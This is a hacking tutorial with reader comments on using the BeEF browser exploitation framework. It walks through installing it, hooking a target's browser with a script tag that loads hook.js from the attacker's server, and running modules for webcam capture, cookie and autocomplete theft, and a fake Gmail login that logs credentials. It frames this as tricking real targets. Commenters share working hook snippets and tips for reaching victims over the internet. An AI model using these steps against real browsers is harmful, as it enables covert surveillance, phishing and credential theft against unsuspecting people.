How To: Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & More

Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & More

People use browsers for all types of things, and in general, we trust a lot of personal information to them. That's why browsers are a perfect attack surface for a hacker, because the target may not even know they are infected and feed you all of the information you could want.

To do this, you need to first trick the user into clicking a link. To generate the link, you can use a tool called BeEF, which used to be preinstalled on Kali Linux.

Similar to Metasploit, BeEF, which stands for Browser Exploitation Framework, is a framework for launching attacks. Unlike with Metasploit, it's specific to launching attacks against web browsers. In some cases, we could use BeEF in conjunction with Metasploit to start more advanced attack scenarios.

The tool was developed by a group of developers led by Wade Alcorn. Built on the familiar Ruby on Rails platform, BeEF was designed to explore the vulnerabilities in browsers and test them. In particular, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.

BeEF can generate a link that can track the target and even run modules to both escalate permissions and gather more information about the person behind the computer. It can even scan behind the network the person's on, which is pretty impressive since you can take pictures with their webcam, see what they're typing, and launch phishing pages to try and get credentials.

Step 1: Install BeEF

BeEF is built right into Kali Linux 2019.2 and older, so you shouldn't have to install anything if you're running one of those versions on your computer.

In mid-2019, Kali removed BeEF as a preinstalled exploitation tool, moving it from "kali-linux-default" to the "kali-linux-large" metapackage. That means that if you installed a fresh version of Kali, you would no longer have BeEF, though, you may retain it if you simply updated your older version of Kali to 2019.3 or higher.

If you already have it, use the following command to update everything. And if you don't have it, the same command will install it. Just make sure to use beef-xss and not "beef" because the latter is a programming language interpreter, which is different. (We made that mistake in our video above, so don't do the same.)

~$ sudo apt install beef-xss

Whether you had it preinstalled from before or had to install it, the rest is the same.

Step 2: Open the BeEF Service

Once BeEF is installed, you can find it under Applications –> System Services, then click on "beef start." It will open a terminal window to start the service.

If you don't see any beef-related tools in that folder, or if you don't see that folder at all, you may have installed "beef" and not "beef-xss" so make sure to do the latter. (You can also start BeEF from the Exploitation Tools folder where it's "beef xss framework.)

> Executing “sudo beef-xss”
[sudo] password for kali:

[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - LSB: BeEF
     Loaded: loaded (/etc/init.d/beef-xss; generated)
     Active: active (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago
       Docs: man:systemd-sysv-generator(8)
    Process: 1432 ExecStart+/etc/init.d/beef-xss start (code=excited, status=0/SUCCESS)
      Tasks: 10 (limit: 6715)
     Memory: 140.8M
     CGroup: /system.slice/beef-xss.service
             └─1438 ruby /usr/share/beef-xss/beef

May 08 12:51:42 kali beef[1]: Starting LSB: BeEF...
May 08 12:51:42 kali beef[1]: Started LSB: BeEF.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

If you run into errors where your browser fails to load, you can bypass the issue by opening up your preferred web browser, like Firefox or Chrome, and going to the following URL, which is for the localhost (127.0.0.1) web server at port 3000.

http://127.0.0.1:3000/ui/panel

Step 3: Log in to the BeEF Service

Once the browser interface opens, you'll need to log in to the BeEF service. The default credentials are beef for the username and beef for the password. However, you may have been prompted to create a password for your beef session (as seen above), and in that case, you would use beef as the username and whatever password you chose.

After logging in successfully, you should see the "Getting Started" page with information about how BeEF works. On the left, there's the Hooked Browsers column, which is where all the browsers you control will end up.

Step 4: Hook the Target Browser

The key to success with BeEF is to "hook" a browser. This basically means that we need the target to visit a vulnerable web app with the "hook.js" JavaScript file. To practice, BeEF provides a webpage for your localhost with the payload in it, so visit that to see how it works.

http://127.0.0.1:3000/demos/basic.html

The injected code in the hooked browser responds to commands from the BeEF server that we control. From there, we can do many mischievous things on the target's computer.

Step 5: View the Browser Details

I've got a few hooked browsers, but I'm going to look at the Chrome one. Click on your hooked browser, and it will jump you to the "Details" tab, which provides information about the hooked browser. Mine shows up as Chrome in the values.

This tab will show you a lot more than that. For me, I see that the platform is Linux x86_64; that it has the Chrome PDF Plugin, Chrome PDF Viewer, and Native Client plugins; the components include webgl, webrtc, and websocket; and other interesting information.

Step 6: Execute Commands in the Browser

Now that we have hooked the target's browser, we can execute some of the built-in modules from the "Commands" tab.

There are over 300 modules, from browser hacks to social engineering, including, but certainly not limited to:

  • Get Visited Domains (browser)
  • Get Visited URLs (browser)
  • Webcam (browser)
  • Get All Cookies (extension)
  • Grab Google Contacts (extension)
  • Screenshot (extension)
  • Steal Autocomplete (social engineering)
  • Google Phishing (social engineering)

When you find a module you want to use, select it, then click "Execute" under its description. As an example, I'm going to use the "Google Phishing" module in the "Social Engineering" folder.

After executing it, a fake Gmail login page will appear in the hooked browser. The user may not think twice about inserting their username and password, and once they do, we log it. Afterward, they are directed back to Google's site as if they logged in regularly.

To find the username and password we logged, just click on the command in the Module Results History column. For me, I see "hfhfhf" as the user and "sdliasdflihasdflh" as the password. You can also view this information from the "Logs" tab.

If we wanted to, we could customize the URL that the Google Phishing module uses, in case you want to use something more believable than the old-style Gmail interface.

Once we have the browser hooked, there are almost unlimited possibilities of what we can do. You could even leverage BeEF for operating system attacks. For more examples of what BeEF can help you accomplish, such as gaining access to the webcam and monitoring keystrokes, check out our Cyber Weapons Lab video above.

BeEF Is a Powerful Web Browser Attack Tool

BeEF is an extraordinary and powerful tool for exploiting web browsers, and it's a terrifying example of why you should never click on suspicious links. Even if things look fine, you should be really careful with anything that pops up in your browser for permission to access your webcam or audio or that needs you to enter in account credentials.

Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.

Buy Now (90% off) >

Cover photo and screenshots by Justin Meyers/Null Byte

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

14 Comments

I've been trying to do this connecting onto another windows 8 pc on the network with no luck please help

Were you on the same Network? I mean same router? What was the error?

I made a html page and included it in the hook.js like this.
<script src="http://192.168.0.101:3000/hook.js">

Then I hosted a server on the above ip on port 80. I can access the created html page on my mobile browser, yet when I opened BeEF panel 127.0.0.1:3000/ui/panel my phone was not shown at the hooked browsers list.

What am I doing wrong here?

But when i used </script> to close the script and tested it on browser, it worked for me. Make sure your both are connected to same server and your apache2 is accessible from phone too.

Your panel should be http://yourip:3000/io/panel

Yes, exacly, as Bibek Adhikari says, when you create a HTML file, you need to write hook.js into a script tag and then close the script tag with </script>

So it will look like this:
<script src="http:/YOURLOCALIP:3000/hook.js"></script>

Then you can host the webpage locally by writing "sudo php -S YOURLOCALIP:80" into terminal.

Yap You get it right bro, and for me i tried it with Apache2 server so it was amazing! But have you tried to run Beef over WAN ? Since every tutorials only shows to do things on the same network so iit would be helpful to me if i get to learn ho w things works at Internet or Wan!! I tried with Ngrok but it sucks

I haven't yet try ngrok, but i read that you need to do port-forwarding. Why did ngrok suck?

Too slow brother maybe it was for free thatsy slow! Ngrok works fine but incase of hooks, it sucks

Portforward to use on wan

Is the beef persistence hook still functional, I tested all and none seem to work both on Firefox or chrome

It does work on mine, and yap Ngrok is useful if you wanna access remotely to android over internet

I read that you can port forward your server on your router, thus it will be accessible by WAN.

please help me to resolve my issue while restating beef-servies, it getting failed to stand after few seconds -

$ sudo systemctl status beef-xss.service
? beef-xss.service - beef-xss
Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
Active: failed (Result: exit-code) since Sat 2020-05-30 14:17:14 UTC; 6s ago
Process: 1340 ExecStart=/usr/share/beef-xss/beef (code=exited, status=1/FAILURE)
Main PID: 1340 (code=exited, status=1/FAILURE)

May 30 14:17:14 mahakaal01 beef1340: from /usr/share/rubygems-integration/all/gems/otr-activerecord-1.4.1/lib/otr-activerecord/activerecord.rb:29:in `configurefromhash!'

May 30 14:17:14 mahakaal01 beef1340: from /usr/share/beef-xss/beef:169:in `<main>'
May 30 14:17:14 mahakaal01 beef1340: 14:17:13* Browser Exploitation Framework (BeEF) 0.5.0.0
May 30 14:17:14 mahakaal01 beef1340: 14:17:13 | Twit: @beefproject
May 30 14:17:14 mahakaal01 beef1340: 14:17:13 | Site: beefproject.com
May 30 14:17:14 mahakaal01 beef1340: 14:17:13 | Blog: blog.beefproject.com
May 30 14:17:14 mahakaal01 beef1340: 14:17:13 |_ Wiki: github.com/beefproject/beef/wiki
May 30 14:17:14 mahakaal01 beef1340: 14:17:13* Project Creator: Wade Alcorn (@WadeAlcorn)
May 30 14:17:14 mahakaal01 systemd1: beef-xss.service: Main process exited, code=exited, status=1/FAILURE
May 30 14:17:14 mahakaal01 systemd1: beef-xss.service: Failed with result 'exit-code'.

Share Your Thoughts

  • Hot
  • Latest